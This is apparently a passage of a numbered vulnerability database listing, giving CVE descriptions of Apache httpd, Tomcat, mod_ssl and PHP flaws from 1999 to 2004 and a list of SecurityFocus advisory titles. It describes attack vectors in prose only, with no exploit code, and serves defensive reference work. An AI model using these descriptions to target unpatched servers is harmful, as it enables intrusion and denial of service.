5194| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
5195| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
5196| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
5197| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
5198| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
5199| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
5200| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
5201| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
5202| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
5203| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
5204| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
5205| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
5206| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
5207| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
5208| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
5209| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
5210| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
5211| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
5212| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
5213| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
5214| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
5215| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
5216| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
5217| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
5218| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
5219| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
5220| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
5221| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
5222| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
5223| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
5224| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
5225| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
5226| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
5227| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
5228| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
5229| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
5230| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
5231| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
5232| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
5233| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
5234| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
5235| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
5236| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
5237| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
5238| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
5239| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
5240| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
5241| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
5242| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
5243| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
5244| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
5245| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
5246| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
5247| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
5248| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
5249| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
5250| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
5251| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
5252| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
5253| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
5254| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
5255| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
5256| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
5257| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
5258| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
5259| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
5260| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
5261| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
5262| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
5263| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
5264| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
5265| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
5266| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
5267| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
5268| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
5269| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
5270| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
5271| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
5272| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
5273| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
5274| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
5275| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
5276| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
5277| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
5278| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
5279| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
5280| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
5281| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
5282| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
5283| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
5284| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
5285| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
5286| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
5287| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
5288| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
5289| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
5290| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
5291| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
5292| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
5293| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
5294| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
5295| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
5296| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
5297| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
5298| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
5299| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
5300| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
5301| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
5302| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
5303| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
5304| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
5305| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
5306| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
5307| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
5308| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
5309| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
5310| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
5311| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
5312| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
5313| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
5314| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
5315| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
5316| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
5317| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
5318| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
5319| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
5320| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
5321| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
5322| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
5323| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
5324| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
5325|
5326| SecurityFocus - https://www.securityfocus.com/bid/:
5327| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
5328| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
5329| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
5330| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
5331| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
5332| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
5333| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
5334| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
5335| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
5336| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
5337| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
5338| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
5339| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
5340| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
5341| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
5342| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
5343| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
5344| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
5345| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
5346| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
5347| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
5348| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
5349| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
5350| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
5351| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
5352| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
5353| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
5354| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
5355| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
5356| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
5357| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
5358| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
5359| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
5360| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
5361| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
5362| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
5363| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
5364| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
5365| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
5366| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
5367| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
5368| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
5369| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
